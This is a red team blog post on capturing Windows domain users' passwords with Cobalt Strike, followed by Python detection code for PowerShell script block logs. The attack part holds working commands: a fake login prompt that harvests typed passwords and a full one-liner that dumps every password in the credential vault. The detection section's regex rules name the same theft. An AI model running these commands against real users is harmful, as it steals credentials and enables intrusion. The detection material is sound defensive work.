Quick ways to get a domain user's password with Cobalt Strike

On a recent Red Team engagement we used two tricks to get a user's credentials that might prove useful to you.

1. The first method, which is well known, is to create a login prompt. A PowerShell script to do this can be found here.

Simply import the script:

  powershell-import /path/to/Invoke-LoginPrompt.ps1
  powershell Invoke-LoginPrompt

Then a prompt will appear on the user's screen.

Once they have entered their password, it will be echoed back in the Cobalt Strike output.

2. The second method for getting user credentials is to use PowerShell to dump the passwords stored in Internet Explorer's credential manager. In a corporate environment, users are likely to have credentials stored for internal intranets, SAP, etc. that could be useful.

It can be done using the following PowerShell one-liner in Cobalt Strike:

  powershell echo "Begin";[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $vault.RetrieveAll() | % { $_.RetrievePassword();echo $_; };echo "Done"

This will then dump the passwords it finds in the credential manager.
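From the defender's side, both tricks leave their script text in PowerShell Script Block Logging (event ID 4104) when that logging is enabled. The following is an added example, not part of the original post: it reassembles script blocks that were logged in several fragments and flags the two commands shown above. The dictionary keys, rule names and sample events are constructed for illustration.

```python
import re
from collections import defaultdict

# Rule name -> patterns that must ALL match one reassembled script block.
# The strings come from the two commands shown in this post.
RULES = {
    "login-prompt": [r"invoke-loginprompt"],
    "vault-dump": [r"windows\.security\.credentials\.passwordvault",
                   r"\.retrieve(all|password)\s*\("],
}

def reassemble(events):
    """Join 4104 fragments of one ScriptBlockId in MessageNumber order."""
    parts = defaultdict(dict)
    for ev in events:
        if ev["event_id"] == 4104:
            parts[ev["script_block_id"]][ev["message_number"]] = ev["text"]
    return {sid: "".join(f[n] for n in sorted(f)) for sid, f in parts.items()}

def detect(events):
    """Return sorted (script_block_id, rule) pairs for every rule that fires."""
    hits = []
    for sid, script in reassemble(events).items():
        text = script.lower()  # PowerShell names are case-insensitive
        for rule, patterns in RULES.items():
            if all(re.search(p, text) for p in patterns):
                hits.append((sid, rule))
    return sorted(hits)

# Constructed sample events (not real telemetry); the dict keys are assumed names.
SAMPLE = [
    {"event_id": 4104, "script_block_id": "a1", "message_number": 1,
     "text": "Invoke-LoginPrompt"},
    # One script block logged as two fragments, delivered out of order.
    {"event_id": 4104, "script_block_id": "b2", "message_number": 2,
     "text": "ntials.PasswordVault; $vault.RetrieveAll() | % { $_.RetrievePassword() }"},
    {"event_id": 4104, "script_block_id": "b2", "message_number": 1,
     "text": "$vault = New-Object Windows.Security.Crede"},
    {"event_id": 4104, "script_block_id": "c3", "message_number": 1,
     "text": "Get-ChildItem C:\\Users | Select-Object Name"},
    # Uses the vault type but never reads passwords back: not flagged.
    {"event_id": 4104, "script_block_id": "d4", "message_number": 1,
     "text": "$v = New-Object Windows.Security.Credentials.PasswordVault; $v.Add($cred)"},
]

if __name__ == "__main__":
    for sid, rule in detect(SAMPLE):
        print(f"script block {sid}: {rule}")
```

Matching on the function name only catches an unrenamed copy of the login prompt script, so treat that rule as a low-cost tripwire rather than full coverage.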